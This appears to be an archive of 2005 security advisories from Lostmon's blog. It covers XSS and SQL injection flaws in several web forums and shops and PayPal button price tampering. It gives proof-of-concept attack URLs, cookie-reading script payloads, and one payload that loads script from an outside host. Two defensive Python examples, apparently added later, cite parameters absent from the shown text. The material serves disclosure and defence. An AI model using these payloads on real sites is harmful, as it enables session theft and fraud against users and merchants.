Original advisory: http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html<br />
Vendor url: http://www.class1web.co.uk/download_forum.php<br />
Vendor notify: yes  exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=17920" target="_BLANK">17920</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17921" target="_BLANK">17921</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17922" target="_BLANK">17922</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17923" target="_BLANK">17923</a><br />
Secunia: <a href="http://secunia.com/advisories/16078/" target="_BLANK">SA16078</a><br />
BID: <a href="http://securityfocus.com/bid/14261/" target="_BLANK">14261</a><br />
Securitytracker: <a href="http://securitytracker.com/id?1014485" target="_BLANK">1014485</a> <a href="http://securitytracker.com/id?1014486" target="_BLANK">1014486</a><br />
##########################################################<br /><br /><br />
class-1 Forum Software is a PHP/MySQL driven web forum.<br /><br />
class-1 Forum contains a flaw that allows a remote cross site<br />
scripting attack. This flaw exists because the application<br />
does not validate the 'viewuser_id' and 'group' variables upon<br />
submission to the 'users.php' script. This could allow a user to create<br />
a specially crafted URL that would execute arbitrary code in a user's<br />
browser within the trust relationship between the browser and<br />
the server, leading to a loss of integrity.<br /><br />
##################<br />
versions<br />
##################<br /><br />
class-1 Forum Software (v 0.23.2) vulnerable.<br />
class-1 Forum Software (v 0.24.4) vulnerable.<br /><br />
It is possible that other versions are vulnerable too.<br /><br />
Clever Copy (http://clevercopy.bestdirectbuy.com/)<br />
with the affected forums module installed:<br /><br />
Clever Copy 2.0<br />
Clever Copy 2.0a<br /><br />
###################<br />
Solution<br />
###################<br /><br />
No solution at this time.<br /><br />
################<br />
Timeline<br />
################<br /><br />
discovered: 10-07-2005<br />
vendor notify: 12-07-2005 (Webform)<br />
vendor response:<br />
2nd vendor response: 12-07-2005 (Clever Copy)<br />
disclosure: 14-07-2005<br /><br /><br />
##############################<br />
proof of cross site scripting<br />
##############################<br /><br />
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]<br /><br />
http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]<br /><br /><br />
#########################<br />
possible SQL injections<br />
#########################<br /><br />
http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]<br /><br />
SQL Error<br />
There was an error executing the query - SELECT * FROM attachments<br />
WHERE attach_id='''<br />
You have an error in your SQL syntax near ''''' at line 1<br /><br />
-------<br /><br />
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]<br /><br />
There was an error executing the query - SELECT * FROM users<br />
WHERE user_id='''<br />
You have an error in your SQL syntax near ''''' at line 1<br /><br />
--------<br /><br />
http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]<br /><br />
There was an error executing the query - SELECT * FROM messages<br />
WHERE id='''<br />
You have an error in your SQL syntax near ''''' at line 1<br /><br />
---------<br /><br />
http://[victim]/forum/viewforum.php?forum=[SQL-Injection]<br /><br />
There was an error executing the query - SELECT * FROM group_permissions<br />
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'<br />
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1<br /><br />
----------<br />
#################### €nd ###########################<br /><br />
Thanks to Estrella for being my light<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>
<br /><br />
ATutor multiple variable Cross site scripting<br />
Posted by Lostmon, 2005-06-15 (updated 2005-07-12)<br />
################################################<br />
ATutor multiple variable cross site scripting<br />
vendor url: http://www.atutor.ca/atutor/download.php<br />
advisory: http://lostmon.blogspot.com/2005/06/atutor-multiple-variable-cross-site.html<br />
vendor notify: yes  exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=17351" target="_BLANK">17351</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17352" target="_BLANK">17352</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17353" target="_BLANK">17353</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17354" target="_BLANK">17354</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17355" target="_BLANK">17355</a>,<br />
<a href="http://osvdb.org/displayvuln.php?osvdb_id=17356" target="_BLANK">17356</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17357" target="_BLANK">17357</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17358" target="_BLANK">17358</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=17359" target="_BLANK">17359</a>.<br />
Secunia: <a href="http://secunia.com/advisories/15705/" target="_BLANK">SA15705</a><br />
Securitytracker: <a href="http://securitytracker.com/id?1014216" target="_BLANK">1014216</a><br />
BID: <a href="http://securityfocus.com/bid/13972" target="_BLANK">13972</a><br />
################################################<br /><br />
ATutor is an Open Source Web-based Learning Content<br />
Management System (LCMS) designed with accessibility<br />
and adaptability in mind.<br /><br />
ATutor contains a flaw that allows a remote cross site<br />
scripting attack. This flaw exists because the application<br />
does not validate multiple variables upon submission<br />
to multiple scripts. This could allow a user to<br />
create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust<br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br /><br /><br />
###########<br />
versions:<br />
###########<br /><br />
ATutor 1.4.3 vulnerable<br />
ATutor 1.5 RC 1 vulnerable<br />
ATutor 1.5 RC 2 vulnerable<br />
ATutor 1.5 RC 3 not tested<br /><br />
#############<br />
solution<br />
#############<br /><br />
Upgrade to version ATutor 1.5RC3 or higher, as it has been<br />
reported to fix this vulnerability. An upgrade is required<br />
as there are no known workarounds.<br /><br /><br />
##############<br />
timeline<br />
##############<br /><br />
discovered: 10-06-2005<br />
vendor notify: 14-06-2005 (webform)<br />
vendor response: 27-06-2005<br />
disclosure: 16-06-2005<br /><br /><br />
##################<br />
Proof of concepts<br />
##################<br /><br />
http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]<br /><br />
http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]<br /><br />
http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]<br /><br />
http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]&words=kk&include=all&find_in=this&display_as=pages&search=Search<br /><br />
http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]&include=one&find_in=all&display_as=summaries&search=Search#search_results<br /><br />
http://[VICTIM]/ATutor/search.php?search=1&words=aa&include=one[XSS-CODE]&find_in=all&display_as=summaries&search=Search#search_results<br /><br />
http://[VICTIM]/ATutor/search.php?search=1&words=aa&include=one&find_in=all[XSS-CODE]&display_as=summaries&search=Search#search_results<br /><br />
http://[VICTIM]/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=[XSS-CODE]summaries&search=Search#search_results<br /><br />
http://[VICTIM]/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=summaries&search=[XSS-CODE]Search#search_results<br /><br />
http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/tile.php?query=yy&field=technicalFormat&submit=Search[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]&field=technicalFormat&submit=Search<br /><br />
http://[VICTIM]/ATutor/tile.php?query=yy&field=technicalFormat[XSS-CODE]&submit=Search<br /><br />
http://[VICTIM]/ATutor/forum/subscribe_forum.php?fid=2&us=1[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=2&reset_filter=Reset+Filter[XSS-CODE]<br /><br />
http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]<br /><br />
Exploiting some of these flaws requires a client login.<br />
Other scripts and other variables are vulnerable<br />
to the same style of attack.<br /><br /><br />
############### €nd ##############<br /><br />
Thanks to Estrella for being my light<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
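The recurring root cause in the Clever Copy, class-1 Forum and ATutor advisories above is that query-string values are written straight back into the page. Two defences close that, and the Python example below, added here and not code from any of those projects, demonstrates both: an allowlist that rejects parameters whose legitimate values have a fixed shape (`yr`, `mth`, `cid`, `searchtype`, with shapes that are my assumptions about those fields), and context-aware HTML encoding for free text such as `searchterm`, so that the `"><script ...>` payloads shown above are rendered as inert text.

```python
"""Two defences the advisories report as missing: strict validation of
parameters whose legitimate values have a known shape, and context-aware HTML
encoding of anything that is reflected. Added example, not code from Clever
Copy, class-1 Forum or ATutor; the parameter names come from the advisories,
the allowed shapes assigned to them are assumptions."""
import html
import re

# Allowlist rules for parameters with a fixed legitimate shape (assumed shapes).
RULES = {
    "yr": re.compile(r"\d{4}"),                   # calendar.php year
    "mth": re.compile(r"1[0-2]|[1-9]"),           # calendar.php month
    "cid": re.compile(r"\d{1,9}"),                # content.php content id
    "searchtype": re.compile(r"category|title"),  # results.php search mode
}

class ValidationError(ValueError):
    """Raised for the first parameter that fails its allowlist rule."""

def validate(params):
    """Return a copy of params if every rule-bound field fully matches its
    rule. Free-text fields (no rule) pass through and must be encoded on output."""
    for name, value in params.items():
        rule = RULES.get(name)
        if rule is not None and rule.fullmatch(value) is None:
            raise ValidationError(f"{name}: value does not match expected shape")
    return dict(params)

def is_valid(params):
    """Boolean form of validate() for callers that only need a yes/no."""
    try:
        validate(params)
    except ValidationError:
        return False
    return True

def render_search_form(searchterm):
    """Reflect free text into an attribute value and into element text,
    encoding for each context so it can neither close the attribute nor
    open a new element."""
    in_attr = html.escape(searchterm, quote=True)   # & < > " ' encoded
    in_text = html.escape(searchterm, quote=False)  # & < > encoded
    return (f'<input type="text" name="searchterm" value="{in_attr}">'
            f'<p>Results for: {in_text}</p>')

def tags_in(fragment):
    """Names of the elements actually present in a rendered fragment, so a
    test can prove that only the intended ones exist."""
    return {t.lower() for t in re.findall(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)", fragment)}

if __name__ == "__main__":
    probe = '"><script src="http://js.example.invalid/x.js"></script>'  # constructed
    print(render_search_form(probe))
    print("elements present:", sorted(tags_in(render_search_form(probe))))
    print("yr=2006 valid:", is_valid({"mth": "3", "yr": "2006"}))
    print("yr with payload valid:", is_valid({"mth": "3", "yr": "2006" + probe}))
```

Validation and encoding are complementary, not alternatives: the allowlist stops a year or an id from ever reaching a template or a query, while encoding is what protects genuinely free-text fields that cannot be constrained.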
</div>
<br /><br />
PayPal arbitrary price manipulation<br />
Posted by Lostmon, 2005-05-30<br />
##############################################<br />
PayPal 'buttons' price manipulation.<br />
vendor url: https://www.paypal.com/<br />
advisory: http://lostmon.blogspot.com/2005/05/paypal-arbitrary-price-manipulation.html<br />
vendor notify: yes  exploit available: yes<br />
Discovered by FalconDeOro (1) and Lostmon (2)<br />
##############################################<br /><br />
PayPal buttons are prone to price manipulation.<br />
All stores based on PayPal buttons are possibly<br />
vulnerable to this flaw.<br /><br /><br />
##########################<br />
code example of a button<br />
##########################<br />
The proof is based on this form:<br /><br />
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside<br /><br />
In the exploitation example we used a "PayPal price manipulation kit" program to shop.<br />
This is a non-existent product...<br /><br />
The link of the button for shopping has this URL:<br />
(1)<br />
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick<br />
&business=[EMAIL-Business]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return<br />
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15<br /><br /><br />
This is the normal price for the product (19.90$), but...<br />
if we change the 'amount' variable to 0.01 the product now costs 0.01$<br /><br />
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick<br />
&business=[EMAIL-Business]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return<br />
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15<br /><br />
Another way of exploiting this situation:<br /><br />
(2)<br />
This other example comes from a store based on PayPal:<br /><br />
https://www.paypal.com/cart/add=1&business=[EMAIL-Business]<br />
&item_name=PayPal+price+manipulation+ kit&item_number=<br />
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0<br />
&shipping2=0&handling=0&rm=2&custom=1&currency_code=USD<br /><br />
If we look closely, we can change not only the price: we can change the email account,<br />
the name of the product, and other details.<br />
For shopping you need an account on PayPal.<br /><br />
#############<br />
timeline:<br />
#############<br /><br />
discovered: 14 may 2005<br />
vendor notify: 25 may 2005<br />
Vendor response: 26 may 2005<br />
disclosure: 27 may 2005<br />
Public disclosure: 30 may 2005<br /><br /><br />
################### End ####################<br /><br />
Thanks to Estrella for being my light<br />
Thanks to Icaro, he is my support<br />
Thanks to FalconDeOro ... patience.<br />
Thanks to all the http://www.osvdb.org Team<br />
Thanks to all who day after day support me !!!<br /><br />
contact FalconDeOro:<br />
(falcondeoro@gmail.com)<br />
http://falcondeoro.blogspot.com<br /><br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Data Mangler of: http://www.osvdb.org<br />
--<br />
Curiosity is what moves the mind<div class="blogger-post-footer">
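The defence on the merchant side follows directly from the advisory: every field in the button URL ('amount', 'item_number', 'business', 'currency_code') is submitted by the buyer's browser, so the store must never trust it and must instead re-check the payment PayPal reports against its own catalogue before shipping anything. The Python example below is added here and is not PayPal's or any store's code. The notification field names it reads (mc_gross, mc_currency, item_number, receiver_email, payment_status) are PayPal IPN names as I recall them and should be confirmed against PayPal's IPN documentation; the catalogue and the three notifications are constructed for the demo.

```python
"""Server-side verification of a PayPal button payment. Added example, not
PayPal's or any store's code. Field names (mc_gross, mc_currency,
item_number, receiver_email, payment_status) are assumed IPN names; confirm
against PayPal's documentation. Catalogue and notifications are constructed."""
from decimal import Decimal, InvalidOperation

# The merchant's own price list is the only authority on what an item costs.
CATALOGUE = {
    "1": {"name": "PayPal price manipulation kit", "price": Decimal("19.90"), "currency": "USD"},
    "7": {"name": "Example hardcover", "price": Decimal("49.00"), "currency": "USD"},
}
MERCHANT_EMAIL = "merchant@example.invalid"   # account that must receive the funds

def verify_payment(ipn, catalogue=CATALOGUE, merchant_email=MERCHANT_EMAIL):
    """Return (accepted, reason). Each rejection names the failing field so it
    can be logged and alerted on; nothing ships unless accepted is True."""
    if ipn.get("payment_status") != "Completed":
        return False, "payment_status is not Completed"
    # The 'business' field in the button is buyer-controlled too: the money
    # must have reached this merchant, not an address swapped into the URL.
    if ipn.get("receiver_email", "").strip().lower() != merchant_email.lower():
        return False, "receiver_email does not match merchant account"
    item = catalogue.get(ipn.get("item_number", ""))
    if item is None:
        return False, "unknown item_number"
    if ipn.get("mc_currency") != item["currency"]:
        return False, "mc_currency mismatch"
    try:
        paid = Decimal(ipn.get("mc_gross", ""))
    except InvalidOperation:
        return False, "mc_gross is not a valid amount"
    # Compare against the catalogue price, never against the amount the
    # button or the buyer supplied.
    if paid < item["price"]:
        return False, f"underpaid: {paid} < {item['price']}"
    return True, "ok"

# Constructed notifications: the legitimate one, the advisory's 19.90 -> 0.01
# manipulation, and a swapped 'business' address.
GOOD = {"payment_status": "Completed", "receiver_email": "merchant@example.invalid",
        "item_number": "1", "mc_gross": "19.90", "mc_currency": "USD"}
PRICE_TAMPERED = dict(GOOD, mc_gross="0.01")
RECEIVER_TAMPERED = dict(GOOD, receiver_email="someone-else@example.invalid")

if __name__ == "__main__":
    for label, ipn in [("good", GOOD), ("price", PRICE_TAMPERED), ("receiver", RECEIVER_TAMPERED)]:
        print(f"{label:9}", verify_payment(ipn))
```

This check runs after the notification itself has been authenticated (PayPal's IPN flow has the merchant post the message back to PayPal and act only on a VERIFIED reply); without that step a forged notification would pass the catalogue comparison trivially. Prices are compared as Decimal, not float, so 19.90 is compared exactly.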
</div>
<br /><br />
Quick Cart Search field cross site scripting and script insertion<br />
Posted by Lostmon, 2005-05-29 (updated 2005-05-31)<br />
#####################################################<br />
Quick Cart search field cross site scripting and script insertion<br />
vendor url: http://www.quickcart.com/<br />
advisory: http://lostmon.blogspot.com/2005/05/quick-cart-search-field-cross-site.html<br />
vendor notify: yes  exploit available: yes<br />
Securitytracker: <a href="http://securitytracker.com/id?1014076" target="_BLANK">1014076</a><br />
#####################################################<br /><br />
Quick Cart contains a flaw that allows a remote cross<br />
site scripting attack. This flaw exists because the<br />
application does not validate the 'search' field upon<br />
submission to the 'search.cfm' script. This could allow a user<br />
to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust<br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br /><br /><br />
############<br />
versions<br />
############<br /><br />
free edition affected:<br />
https://www.quickcart.com/qc_checkout.cfm<br /><br /><br />
but it is possible that other versions (standard or others) are affected<br /><br /><br />
################<br />
solution<br />
################<br /><br />
no solution was available at this time<br /><br />
#############<br />
Timeline<br />
#############<br /><br />
discovered: 10 may 2005<br />
vendor notify: 27 may 2005<br />
vendor response: 27 may 2005<br />
disclosure: 29 may 2005<br /><br />
##############<br />
exploit<br />
##############<br /><br />
Put this in the search box of the store:<br /><br />
//"><script>alert(document.cookie)</script><br /><br />
or<br /><br />
//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script><br /><br />
and the script executes; this is an XSS flaw<br />
and a possible script insertion.<br /><br /><br />
#################### €nd ###################<br /><br />
Thanks to http://www.drorshalev.com for this script<br />
and for hosting it for this demonstration.<br /><br />
Thanks to Estrella for being my light<br />
Thanks to all the http://www.osvdb.org Team<br />
Thanks to all who day after day support me !!!<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Data Mangler of: http://www.osvdb.org<br />
--<br />
Curiosity is what moves the mind<div class="blogger-post-footer">
</div>
<br /><br />
BookReview 1.0 multiple variable XSS<br />
Posted by Lostmon, 2005-05-25 (updated 2005-05-28)<br />
###################################################<br />
BookReview 1.0 multiple variable XSS<br />
vendor url: http://www.readersunite.com<br />
advisory: http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html<br />
vendor notify: yes  exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=16871" target="_BLANK">16871</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16872" target="_BLANK">16872</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16873" target="_BLANK">16873</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16874" target="_BLANK">16874</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16875" target="_BLANK">16875</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16876" target="_BLANK">16876</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16877" target="_BLANK">16877</a>,<br />
<a href="http://osvdb.org/displayvuln.php?osvdb_id=16878" target="_BLANK">16878</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16879" target="_BLANK">16879</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16880" target="_BLANK">16880</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=16881" target="_BLANK">16881</a><br />
BID: <a href="http://securityfocus.com/bid/13783" target="_BLANK">13783</a><br />
Securitytracker: <a href="http://securitytracker.com/id?1014058" target="_BLANK">1014058</a><br />
###################################################<br /><br />
BookReview contains a flaw that allows a remote cross<br />
site scripting attack. This flaw exists because the<br />
application does not validate multiple variables upon<br />
submission to multiple scripts. This could allow a user<br />
to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust<br />
relationship between the browser and the server,<br />
leading to a loss of integrity.<br /><br />
############<br />
versions:<br />
############<br /><br />
BookReview beta 1.0 vulnerable.<br /><br />
##############<br />
solution<br />
##############<br /><br />
no solution was available at this time<br /><br />
###########<br />
timeline<br />
###########<br /><br />
discovered: 27 april 2005<br />
vendor notify: 17 may 2005 (webform)<br />
disclosure: 26 may 2005<br /><br />
##################<br />
proof of concepts<br />
##################<br /><br />
All files are submitted to the 'index.php' script via the 'page' variable, like<br />
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]<br />
The name of the module can be 'add_review', 'add_contents' or others.<br /><br />
For example this URL:<br />
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25<br /><br />
is the same as this:<br /><br />
http://[victim]/add_contents.htm?isbn=083081423X&chapters=25<br /><br />
With this in mind, there are two ways of exploiting this situation:<br />
one through index.php and the other directly through the module.<br /><br />
##################<br />
add_review.htm<br />
##################<br /><br />
http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true<br /><br />
http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true<br /><br />
http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true<br /><br />
http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script><br /><br />
###################<br />
index.php<br />
###################<br /><br />
http://[victim]/index.php?page=add_contents&isbn=083081423X<br
/>%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25<br /><br />http://[victim]/index.php?page=add_contents&isbn=083081423X<br />&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />NICE ERROR !!<br /><br /><blockquote><br />; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; 
roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }<br /></blockquote><br /><br />
###################<br />
add_contents.htm<br />
###################<br /><br /><br />
http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />
http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />
http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />
http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br /><br />
#########################<br />
others<br />
#########################<br /><br />
http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E<br /><br />
http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author<br /><br />
http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels<br /><br />
http://[victim]/suggest_review.htm?node=Business_and_Economics"><script>alert(document.cookie)</script><br /><br />
############################<br />
possible local file inclusion<br />
############################<br /><br />
http://[victim]/suggestions/"><script>alert(document.cookie)</script> .htm<br /><br />
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm<br /><br /><br /><br />
################<br />
path disclosure:<br />
################<br /><br />
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=author<br /><br />
http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title<br /><br />
######################## €nd ########################<br /><br />
Thanks to Estrella for being my light<br />
Thanks to Icaro, he is my Shadow !!!<br />
Thanks to all the http://www.osvdb.org Team<br />
Thanks to all who day after day support me !!!<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Data Mangler of: http://www.osvdb.org<br />
--<br />
Curiosity is what moves the mind<div class="blogger-post-footer">
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116936994125178902005-05-24T05:15:00.000-07:002005-05-25T17:42:21.703-07:00Spread The Word multiple XSS and SQL injections####################################################<br />Spread The Word (comersus based bookstore ) multiple<br />script and variables XSS and SQL Injections vulnerabilities.<br />vendor url:http://www.stwm.com/opportunity.asp<br />advisore url:http://lostmon.blogspot.com/2005/05/<br />spread-word-multiple-xss-and-sql.html<br />vendor notified:yes exploit available: yes<br />BID:<a href="http://securityfocus.com/bid/13733" target="_BLANK">13733</a> and <a href="http://securityfocus.com/bid/13737" target="_BLANK">13737</a><br />####################################################<br /><br />Spread The Word (comersus based bookstore ) contains a flaw that <br />allows a remote cross site scripting attack.This flaw exists because<br />the application does not validate multiple variables upon submission<br />to multiple scripts.This could allow a user to create a specially <br />crafted URL that would execute arbitrary code in a user's browser <br />within the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />##############<br />versions:<br />##############<br /><br /> I can´t established what version are affected.<br /><br />##############<br />solution:<br />##############<br /><br />no solution was available at this time.<br /><br />##############<br />timeline<br />##############<br /><br />discovered: 17 oct 2004<br />vendor notify: 08 april 2005 <br />vendor response: 11 april 2005<br />disclosure: 24 may 2005<br /><br /><br /><br />####################<br />proof of concepts:<br />####################<br /><br />Some files have diferent prefix like STW<br />ej: 'ShowContent.asp' in others stores are 
'STWShowContent.asp'<br /><br />#####################<br />BrowseCategories.asp<br />#####################<br /><br />XSS, SQL errors and path disclosure.<br /><br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible<br /><br />http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible<br /><br />Cat0Literal can be books, videos, gifts, bibles, or other similar categories listed in the cart.<br /><br />#############<br />search.asp<br />#############<br /><br />XSS, SQL errors and path disclosure.<br /><br />http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala<br /><br />http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1<br /><br 